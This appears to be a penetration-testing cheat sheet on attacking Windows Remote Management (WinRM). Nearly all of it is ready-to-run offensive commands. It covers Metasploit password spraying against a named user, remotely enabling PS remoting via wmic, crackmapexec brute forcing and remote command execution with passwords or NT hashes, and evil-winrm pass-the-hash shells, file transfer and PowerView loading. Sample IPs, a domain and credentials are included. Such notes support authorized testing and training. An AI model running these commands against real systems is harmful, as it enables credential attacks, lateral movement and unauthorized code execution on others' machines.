WinRM — TCP 5985 (HTTP) / 5986 (HTTPS). A successful WinRM login needs an account that is a local Administrator or a member of the "Remote Management Users" group on the target; valid domain creds alone are not enough.
#Metasploit recon (password spray of one username against a wordlist — check the domain lockout threshold before running it)
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.11.1.13
set USERNAME DISCO
set PASS_FILE /usr/share/wordlists/fasttrack.txt
set DOMAIN disco.thinc
run
#Activate remotely using wmic (requires local admin rights on <REMOTE_HOST>; add /user: and /password: if you are not already authenticated as such)
#Note: enable-psremoting starts the WinRM service and adds a firewall rule for 5985 — a persistent, logged configuration change on the target
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
#Bruteforcing (every username is tried against every password — noisy, and will lock accounts out if the policy has a lockout threshold)
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a single pair of credentials
# Username + Password + CMD command execution (-x runs the command through cmd.exe)
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + NT hash + PowerShell command execution (-X runs the command through PowerShell; -H takes the NT hash only, not LM:NT)
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will tell you whether the creds are valid for WinRM access (use evil-winrm below for the shell)
#Pass-the-hash with evil-winrm (-H takes the NT hash only; add -S to connect over HTTPS on 5986 instead of HTTP on 5985)
evil-winrm -u <username> -H <Hash> -i 10.10.10.10
#evil-winrm assorted
#Connect with creds
# -s <dir> makes the PowerShell scripts in that local directory (here "." = the current one) available to load from the remote session
evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .
#Upload and Download (run from inside the evil-winrm prompt; destination_filename is optional)
upload local_filename (destination_filename)
download remote_filename (destination_filename)
#List all services and show whether your account has permissions over each one
services
#Menu listing the loaded modules/functions (the default set is shown below)
menu
# You can load a local PS1 script just by typing its name at the prompt
# The script must be in the directory set with the -s argument; its functions then appear in the menu
> Powerview.ps1
> menu